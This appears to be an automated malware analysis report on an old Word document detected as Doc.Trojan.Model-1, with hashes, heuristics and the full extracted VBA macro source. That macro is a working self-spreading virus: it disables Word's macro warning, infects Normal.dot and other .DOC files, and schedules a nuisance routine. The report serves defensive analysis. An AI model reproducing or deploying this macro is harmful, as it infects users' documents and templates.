Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c594669c1424e1f…

MALICIOUS

Office (OLE)

36.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 23885fe6e32b0304a55193db18cfc8fc SHA-1: e8b494519e913238f92b4145b7bfe6acd7a97524 SHA-256: 4c594669c1424e1f2b869a77b27783715a1f53f33f2ced3f98d1a26972b3b21d
360 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically triggering AutoOpen and AutoClose events. The macros attempt to copy themselves to other documents and the Normal.dot template, suggesting a worm-like behavior for propagation. ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Trojan.Model-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Model-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 31,202 bytes but its declared streams total only 0 bytes — 31,202 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7675 bytes
SHA-256: a06824220986a79443638823d3d86262b1f9163d9fed71321d99db0ba810667d
Detection
ClamAV: Doc.Trojan.Model-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Code"
Sub AutoNew()
    CopyVirCode
End Sub
Sub AutoOpen()
    CopyVirCode
End Sub
Sub AutoExec()
    CopyVirCode
End Sub
Sub AutoClose()
    CopyVirCode
End Sub
Sub AutoExit()
    CopyVirCode
End Sub
Private Sub CopyVirCode()
    On Local Error Resume Next
    RemoveProtection
    If Not ActiveDocument = NormalTemplate Then 'Infetta Normal.dot
        CopyVirCodeToModel
    End If
    If Not ActiveDocument = ThisDocument Then   'Infetta il documento aperto
        CopyVirCodeToDocument ActiveDocument
    End If
End Sub
Private Sub CopyVirCodeToModel()
    On Local Error Resume Next
    oldDate = Date
    Date = FileDateTime(FileName)
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal.dot"
    End With
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
    NormalTemplate.Save
    Date = oldDate
End Sub
Private Sub CopyVirCodeToDocument(Target As Document)
    On Local Error Resume Next
    Set fs = Application.FileSearch
    With fs
     .LookIn = Target.Path
     .FileName = "*.DOC"
     If .Execute(SortBy:=msoSortByFileName, SortOrder:=msoSortOrderAscending) > 0 Then
      Randomize
      FileName = .FoundFiles(Int((.FoundFiles.Count * Rnd) + 1))
      oldDate = Date
      Date = FileDateTime(FileName)
      Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=FileName, Name:="Code", Object:=wdOrganizerObjectProjectItems
      Date = oldDate
     Else
       Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
     End If
    End With
    Application.OnTime When:=Now + TimeValue("04:00:00"), Name:="Normal.Code.Bomb"
End Sub
Private Sub RemoveProtection()
    'Disattiva il messaggio di avviso iniziale
    Options.VirusProtection = False
End Sub
Private Sub Bomb()
    On Local Error Resume Next
    For Each myTask In Tasks
     oldWindowState = ActiveWindow.WindowState
    
     myTask.WindowState = wdWindowStateMinimize
     myTask.WindowState = wdWindowStateMaximize
     myTask.WindowState = oldWindowState
    Next myTask
    Application.OnTime When:=Now + TimeValue("01:00:00"), Name:="Normal.Code.Bomb"
End Sub

' Processing file: /opt/analyzer/scan_staging/dce4f56e34884ae79975640ca5af968b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Code - 4331 bytes
' Line #0:
' 	FuncDefn (Sub AutoNew())
' Line #1:
' 	ArgsCall CopyVirCode 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Sub AutoOpen())
' Line #4:
' 	ArgsCall CopyVirCode 0x0000 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Sub AutoExec())
' Line #7:
' 	ArgsCall CopyVirCode 0x0000 
' Line #8:
' 	EndSub 
' Line #9:
' 	FuncDefn (Sub AutoClose())
' Line #10:
' 	ArgsCall CopyVirCode 0x0000 
' Line #11:
' 	EndSub 
' Line #12:
' 	FuncDefn (Sub AutoExit())
' Line #13:
' 	ArgsCall CopyVirCode 0x0000 
' Line #14:
' 	EndSub 
' Line #15:
' 	FuncDefn (Private Sub CopyVirCode())
' Line #16:
' 	OnError <crash> 
' Line #17:
' 	ArgsCall RemoveProtection 0x0000 
' Line #18:
' 	Ld ActiveDocument 
' 	Ld NormalTemplate 
' 	Eq 
' 	Not 
' 	IfBlock 
' 	QuoteRem 0x0030 0x0012 "Infetta Normal.dot"
' Line #19:
' 	ArgsCall CopyVirCodeToModel 0x0000 
' Line #20:
' 	EndIfBlock 
' Line #21:
' 	Ld ActiveDocument 
' 	Ld ThisDocument 
' 	Eq 
' 	Not 
' 	IfBlock 
' 	QuoteRem 0x0030 0x001B "Infetta il documento aperto"
' Line #22:
' 	Ld ActiveDocument 
' 	ArgsCall CopyVirCodeToDocument 0x0001 
' Line #23:
' 	EndIfBlock 
' Line #24:
' 	EndSub 
' Line #25:
' 	FuncDefn (Private Sub CopyVirCodeToModel())
' Line
... (truncated)
embedded_office_off0000181e.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x181E 31202 bytes
SHA-256: 741ad8c7c623f29311e7da4593cfc0c792d9d4d1224308b2c11a9ce166e9d830

Open this report in the interactive analyzer, or submit your own file for analysis.